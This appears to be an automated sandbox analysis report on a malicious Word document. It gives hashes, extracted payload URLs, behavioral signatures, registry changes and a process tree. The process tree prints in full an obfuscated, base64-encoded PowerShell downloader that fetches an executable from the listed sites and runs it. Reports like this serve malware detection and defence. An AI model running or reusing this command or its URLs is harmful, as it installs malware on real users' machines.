Analysis
-
max time kernel
118s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
20-09-2024 16:29
Behavioral task
behavioral1
Sample
edfcf207022a488f4942714d7bb6f9dd_JaffaCakes118.doc
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
edfcf207022a488f4942714d7bb6f9dd_JaffaCakes118.doc
Resource
win10v2004-20240802-en
General
-
Target
edfcf207022a488f4942714d7bb6f9dd_JaffaCakes118.doc
-
Size
160KB
-
MD5
edfcf207022a488f4942714d7bb6f9dd
-
SHA1
f84d6fba0d3cb5fb28d7e2ca535e4be871ed954b
-
SHA256
82f0bd4bdac36035d974d39ad2fe45af7de1dcd1708e3908347da13fb75a7e87
-
SHA512
e61c2161b6f36c622ec8b3cec2266fa824df71bdd47fbd501811e6ece672ee7935665b86984df6e23baae6c745a2de325f965b631206bd33400c649f30bded36
-
SSDEEP
1536:8Ij9atFqpRIj9atFqpvrdi1Ir77zOH98Wj2gpngB+a9zGU3N7NSAuS:2rfrzOH98ipg+m7NSAL
Malware Config
Extracted
https://templatejson.com/awrrn/Kw10uo/
https://hosting.mybestheme.com/aikjj0q/8/
https://tastes2plate.com/wp-content/uploads/6/
http://madeirawildlife.com/wp-admin/zuWZW/
http://senyumdesa.org/wp-admin/aC4/
https://ibuyoldwebsites.com/modules/QVtEr7/
http://blog.zunapro.com/wp-admin/js/widgets/EH4agl/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2660 2544 powershell.exe 30 -
Blocklisted process makes network request 3 IoCs
flow pid Process 3 2660 powershell.exe 5 2660 powershell.exe 6 2660 powershell.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WINWORD.EXE -
Office loads VBA resources, possible macro or embedded object present
-
Modifies registry class 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}\ = "IOptionFrame" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3}\ = "MdcCheckBoxEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}\ = "Tab" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}\ = "Tabs" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{4C599243-6926-101B-9992-00000B65C6F9} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}\ = "FormEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}\ = "IDataAutoWrapper" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}\ = "Controls" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{4C599243-6926-101B-9992-00000B65C6F9} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3}\ = "MdcTextEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3}\ = "MdcListEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents2" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}\ = "IDataAutoWrapper" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}\ = "IReturnInteger" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}\ = "IScrollbar" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}\ = "Controls" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}\ = "ISpinbutton" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLTextArea" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}\ = "_UserForm" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLCheckbox" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLTextArea" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F}\ = "TabStripEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSubmitButton" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLPassword" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSelect" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{C510F7AB-8685-42B7-992B-06A060E326EA}\2.0\HELPDIR WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLImage" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLPassword" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents4" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCombo" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}\ = "MultiPageEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\TypeLib\{C510F7AB-8685-42B7-992B-06A060E326EA}\2.0 WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}\ = "IReturnInteger" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}\ = "IReturnBoolean" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3}\ = "MdcListEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2644 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2660 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2660 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 2644 WINWORD.EXE 2644 WINWORD.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 2644 wrote to memory of 1592 2644 WINWORD.EXE 34 PID 2644 wrote to memory of 1592 2644 WINWORD.EXE 34 PID 2644 wrote to memory of 1592 2644 WINWORD.EXE 34 PID 2644 wrote to memory of 1592 2644 WINWORD.EXE 34
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\edfcf207022a488f4942714d7bb6f9dd_JaffaCakes118.doc"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2644 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:1592
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e JABJAHEAYQBqAG0AcAB5AD0AKAAoACcAVgAnACsAJwBiAHkAdgAnACkAKwAnAHgAJwArACcAagB6ACcAKQA7ACYAKAAnAG4AZQB3ACcAKwAnAC0AJwArACcAaQB0AGUAbQAnACkAIAAkAEUATgB2ADoAVQBTAGUAcgBQAHIAbwBmAEkATABlAFwAZABJAGEAUgA4AGgANwBcAG8AZgBmADEARgBFAFkAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAARABpAHIARQBjAHQAbwByAFkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMAZQBjAHUAYABSAGAASQB0AFkAYABwAFIATwBgAFQAbwBjAG8ATAAiACAAPQAgACgAJwB0AGwAJwArACcAcwAxACcAKwAoACcAMgAsACAAdABsAHMAMQAnACsAJwAxACcAKwAnACwAJwApACsAKAAnACAAdABsACcAKwAnAHMAJwApACkAOwAkAEsAdwBwAHYANwBhAHoAIAA9ACAAKAAnAEoAJwArACcAXwBlACcAKwAoACcAaQBsACcAKwAnAGIAJwApACkAOwAkAEEAdAB4ADMAcQBlAGYAPQAoACcASAA5ACcAKwAnAGgAagAnACsAKAAnAHEAJwArACcAYQBxACcAKQApADsAJABGAHAAegBtAHYAagA2AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACgAKAAnAHEAJwArACgAJwBJACcAKwAnAEwARABpAGEAJwApACsAJwByADgAJwArACgAJwBoADcAJwArACcAcQAnACkAKwAoACcASQBMAE8AZgAnACsAJwBmACcAKwAnADEAZgBlACcAKwAnAHkAcQBJAEwAJwApACkALgAiAHIAYABFAFAAYABMAEEAYwBFACIAKAAoAFsAQwBoAEEAcgBdADEAMQAzACsAWwBDAGgAQQByAF0ANwAzACsAWwBDAGgAQQByAF0ANwA2ACkALAAnAFwAJwApACkAKwAkAEsAdwBwAHYANwBhAHoAKwAoACcALgAnACsAKAAnAGUAeAAnACsAJwBlACcAKQApADsAJABTAHUAcAB4ADYAdQBrAD0AKAAoACcASABxACcAKwAnADgAbgBnACcAKwAnAF8AJwApACsAJwBwACcAKQA7ACQATgA1ADgAaQB5AGEAMgA9ACYAKAAnAG4AZQAnACsAJwB3AC0AbwBiAGoAJwArACcAZQBjAHQAJwApACAAbgBlAHQALgB3AGUAYgBjAEwASQBFAE4AdAA7ACQAVgB6ADAAYgBnAGMANgA9ACgAJwBoACcAKwAoACcAdAB0ACcAKwAnAHAAJwApACsAJwBzACcAKwAoACcAOgAvACcAKwAnAC8AdABlACcAKQArACgAJwBtAHAAbABhAHQAJwArACcAZQAnACsAJwBqACcAKwAnAHMAbwBuAC4AYwAnACkAKwAnAG8AbQAnACsAKAAnAC8AYQB3AHIAcgAnACsAJwBuAC8ASwB3ADEAJwArACcAMAB1ACcAKwAnAG8AJwArACcALwAqAGgAdAAnACkAKwAnAHQAJwArACgAJwBwAHMAOgAnACsAJwAvAC8AaAAnACkAKwAoACcAbwAnACsAJwBzAHQAaQBuAGcAJwApACsAKAAnAC4AbQB5ACcAKwAnAGIAJwApACsAJwBlACcAKwAnAHMAJwArACcAdAAnACsAKAAnAGgAJwArACcAZQBtACcAKQArACgAJwBlAC4AYwBvAG0AJwArACcALwBhAGkAJwArACcAawBqAGoAJwApACsAKAAnADAAJwArACcAcQAvADgALwAnACkAKwAnACoAJwArACcAaAB0ACcAKwAoACcAdABwAHMAOgAnACsAJwAvACcAKQArACcALwB0ACcAKwAoACcAYQBzAHQAZQAnACsAJwBzACcAKQArACgAJwAyAHAAJwArACcAbABhAHQAZQAnACkAKwAoACcALgBjAG8AJwArACcAbQAvAHcAcAAtAGMAJwApACsAKAAnAG8AJwArACcAbgB0AGUAJwApACsAJwBuAHQAJwArACgAJwAvAHUAJwArACcAcAAnACkAKwAoACcAbABvACcAKwAnAGEAJwApACsAKAAnAGQAJwArACcAcwAvADYAJwArACcALwAqAGgAdAB0ACcAKQArACcAcAA6ACcAKwAnAC8ALwAnACsAJwBtACcAKwAoACcAYQBkACcAKwAnAGUAJwApACsAKAAnAGkAcgAnACsAJwBhACcAKQArACcAdwAnACsAKAAnAGkAJwArACcAbABkAGwAJwApACsAJwBpACcAKwAnAGYAJwArACcAZQAnACsAKAAnAC4AJwArACcAYwBvACcAKQArACgAJwBtAC8AdwBwACcAKwAnAC0AJwApACsAJwBhACcAKwAoACcAZABtAGkAJwArACcAbgAvAHoAdQAnACkAKwAoACcAVwAnACsAJwBaAFcALwAnACkAKwAnACoAaAAnACsAKAAnAHQAJwArACcAdABwACcAKQArACcAOgAvACcAKwAnAC8AcwAnACsAKAAnAGUAbgAnACsAJwB5ACcAKQArACcAdQAnACsAJwBtACcAKwAoACcAZABlAHMAYQAnACsAJwAuACcAKwAnAG8AJwApACsAJwByACcAKwAoACcAZwAvAHcAcAAnACsAJwAtAGEAJwArACcAZABtACcAKQArACgAJwBpACcAKwAnAG4ALwAnACkAKwAoACcAYQAnACsAJwBDADQALwAqACcAKQArACgAJwBoACcAKwAnAHQAdABwAHMAJwApACsAJwA6AC8AJwArACgAJwAvAGkAYgB1ACcAKwAnAHkAbwAnACkAKwAoACcAbABkACcAKwAnAHcAZQAnACkAKwAoACcAYgBzAGkAJwArACcAdABlAHMAJwApACsAJwAuACcAKwAnAGMAJwArACgAJwBvACcAKwAnAG0ALwBtAG8AZAAnACsAJwB1AGwAJwApACsAKAAnAGUAcwAvACcAKwAnAFEAJwApACsAKAAnAFYAJwArACcAdABFACcAKQArACcAcgAnACsAKAAnADcALwAnACsAJwAqACcAKQArACgAJwBoAHQAJwArACcAdABwACcAKQArACgAJwA6AC8ALwAnACsAJwBiAGwAJwApACsAKAAnAG8AZwAnACsAJwAuAHoAdQAnACsAJwBuAGEAcAByAG8ALgBjACcAKQArACgAJwBvAG0ALwAnACsAJwB3AHAAJwApACsAJwAtACcAKwAnAGEAZAAnACsAKAAnAG0AJwArACcAaQBuAC8AJwApACsAJwBqAHMAJwArACgAJwAvACcAKwAnAHcAaQBkACcAKQArACgAJwBnAGUAJwArACcAdABzAC8ARQBIACcAKQArACgAJwA0AGEAJwArACcAZwBsACcAKQArACcALwAnACkALgAiAFMAYABwAGwASQBUACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQASAA2AF8AMQAxAHgAaAA9ACgAKAAnAFMAagBuAHgAcQAnACsAJwBfACcAKQArACcAagAnACkAOwBmAG8AcgBlAGEAYwBoACgAJABIAGMAZABqAHEAbAB0ACAAaQBuACAAJABWAHoAMABiAGcAYwA2ACkAewB0AHIAeQB7ACQATgA1ADgAaQB5AGEAMgAuACIAZABvAGAAdwBOAEwAYABvAEEARABGAGAASQBMAEUAIgAoACQASABjAGQAagBxAGwAdAAsACAAJABGAHAAegBtAHYAagA2ACkAOwAkAFgAaQBvAHoANwBwADEAPQAoACcARwAnACsAJwBoACcAKwAoACcAcQBhAGgAJwArACcAMwB3ACcAKQApADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAEYAcAB6AG0AdgBqADYAKQAuACIAbABFAG4AZwBgAFQAaAAiACAALQBnAGUAIAAyADUANwA0ADcAKQAgAHsAJgAoACcASQBuAHYAbwBrAGUALQBJACcAKwAnAHQAJwArACcAZQAnACsAJwBtACcAKQAoACQARgBwAHoAbQB2AGoANgApADsAJABIAF8AdgBhADIAYgBjAD0AKAAoACcAWgAnACsAJwA5AHcAJwApACsAKAAnAGcAeQAnACsAJwBfAGwAJwApACkAOwBiAHIAZQBhAGsAOwAkAFIAcgAwAHYAMgBhADYAPQAoACgAJwBOACcAKwAnAHIAcwAnACkAKwAoACcAZwAnACsAJwBoAGoAOQAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAQwBlAGUAXwB6AGgAZwA9ACgAJwBJACcAKwAoACcAbQA5ACcAKwAnAHMAJwApACsAKAAnAGUAawAnACsAJwB2ACcAKQApAA==1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2660
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
19KB
MD5789271323a35c6fd60dcd99f22454938
SHA1ea45b81b34c4adecb3d86b0908b3c30c1a498056
SHA2563496b96637df53712399a5936f3e985b7b9d1b033aa7263f7f7d8eeca86ad840
SHA512f069df76814287417e36b3be29505d8964626ff3543ad3b90a6814fc0ba5779c8f5c3b9b23a1427e2c5e3886713bdfc183c746fb8e0f86f504a1c15b84a40b57